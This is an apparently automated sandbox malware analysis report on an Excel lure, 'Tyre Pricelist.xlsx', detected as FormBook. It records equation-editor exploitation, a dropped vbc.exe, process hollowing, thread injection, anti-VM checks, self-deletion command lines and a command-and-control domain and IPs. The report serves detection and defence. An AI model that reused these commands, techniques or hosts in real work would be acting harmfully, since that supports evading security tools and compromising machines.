          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e.....................%.............(.%.....2.......D...............Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................P...........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys....@.%.....4.......................(.%.....&.......................Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ................................`3......(.P.....P.......................%.......................................................................Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ................................Y.......(.P.....P...............................................................................................Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeConsole Write: ........................................(.P.....P...............................................................................................Jump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Tyre Pricelist.xlsxVirustotal: Detection: 27%
          Source: Tyre Pricelist.xlsxReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Tyre Pricelist.xlsxStatic file information: File size 2481664 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: netstat.pdb source: RegAsm.exe, 00000006.00000002.2216733185.00000000002AC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, NETSTAT.EXE
          Source: Tyre Pricelist.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Tyre Pricelist.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004169BB push esi; ret 6_2_004169BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040AB07 push ds; retf 6_2_0040AB09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00414E05 push ss; retf 6_2_00414E06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEF2 push eax; ret 6_2_0041CEF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEFB push eax; ret 6_2_0041CF62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEA5 push eax; ret 6_2_0041CEF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CF5C push eax; ret 6_2_0041CF62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253DFA1 push ecx; ret 6_2_0253DFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BE3E6 pushad ; ret 6_2_008BE3E7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5DFA1 push ecx; ret 11_2_00C5DFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_000969BB push esi; ret 11_2_000969BC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0008AB07 push ds; retf 11_2_0008AB09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00094E05 push ss; retf 11_2_00094E06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEA5 push eax; ret 11_2_0009CEF8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEFB push eax; ret 11_2_0009CF62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEF2 push eax; ret 11_2_0009CEF8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CF5C push eax; ret 11_2_0009CF62
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Tyre Pricelist.xlsxStream path 'EncryptedPackage' entropy: 7.99990874269 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409A80 rdtsc 6_2_00409A80
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2852Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1028Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2792Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2195930898.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2190381615.0000000000946000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409A80 rdtsc 6_2_00409A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_02530048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov ecx, dword ptr fs:[00000030h]4_2_002F00AD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov eax, dword ptr fs:[00000030h]4_2_002F00AD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F01CB mov eax, dword ptr fs:[00000030h]4_2_002F01CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025200EA mov eax, dword ptr fs:[00000030h]6_2_025200EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02520080 mov ecx, dword ptr fs:[00000030h]6_2_02520080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025426F8 mov eax, dword ptr fs:[00000030h]6_2_025426F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C626F8 mov eax, dword ptr fs:[00000030h]11_2_00C626F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 180.215.92.80 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: FF0000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'Jump to behavior
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Disable or Modify Tools1Credential API Hooking1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information41Security Account ManagerSystem Information Discovery112SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery221Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection612/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 321115 Sample: Tyre Pricelist.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for dropped file 2->68 70 14 other signatures 2->70 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 14 2->15         started        process3 dnsIp4 44 workfinethdysanotherrainbowlomoyentthghf.ydns.eu 103.125.191.5, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 38 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->38 dropped 40 C:\Users\Public\vbc.exe, PE32 10->40 dropped 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->82 17 vbc.exe 1 10->17         started        42 C:\Users\user\Desktop\~$Tyre Pricelist.xlsx, data 15->42 dropped file5 signatures6 process7 signatures8 50 Antivirus detection for dropped file 17->50 52 Multi AV Scanner detection for dropped file 17->52 54 Machine Learning detection for dropped file 17->54 56 2 other signatures 17->56 20 RegAsm.exe 17->20         started        23 RegAsm.exe 17->23         started        25 cmd.exe 17->25         started        process9 signatures10 72 